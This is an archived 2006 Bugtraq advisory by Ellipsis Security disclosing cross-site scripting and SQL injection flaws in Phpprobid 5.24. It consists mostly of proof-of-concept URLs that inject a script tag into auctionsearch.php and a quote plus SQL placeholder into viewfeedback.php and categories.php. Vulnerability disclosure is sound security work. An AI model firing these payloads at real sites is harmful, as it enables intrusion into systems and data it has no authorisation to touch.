[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Phpprobid <= 5.24 XSS SQL injection Vulnerability

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Phpprobid <= 5.24 XSS SQL injection Vulnerability
From: securityconnection@xxxxxxxxx
Date: 25 Jul 2006 17:15:14 -0000

Phpprobid 5.24
http://www.phpprobid.com
--------------------------
Cross Site Scripting (XSS)
--------------------------
http://target.xx/auctionsearch.php?advsrc=";<script>alert(/EllipsisSecurityTest/)</script>
http://target.xx/auctionsearch.php?start=1&advsrc=";><script>alert(/EllipsisSecurityTest/)</script>
-------------
SQL injection
-------------
http://target.xx/viewfeedback.php?view=1'[SQL]
http://target.xx/viewfeedback.php?view=all&start=1'[SQL]
http://target.xx/categories.php?parent=&start=&orderField=itemname&orderType=1'[SQL]
-----------------
Ellipsis Security
http://www.ellsec.org

Prev by Date: Secunia Research: FileCOPA Directory Argument Handling Buffer Overflow
Next by Date: Re: new shell bypass safe mode
Previous by thread: Secunia Research: FileCOPA Directory Argument Handling Buffer Overflow
Next by thread: NSFOCUS SA2006-07 : ISS RealSecure/BlackICE MailSlot Heap Overflow Detection Remote DoS Vulnerability
Index(es):
- Date
- Thread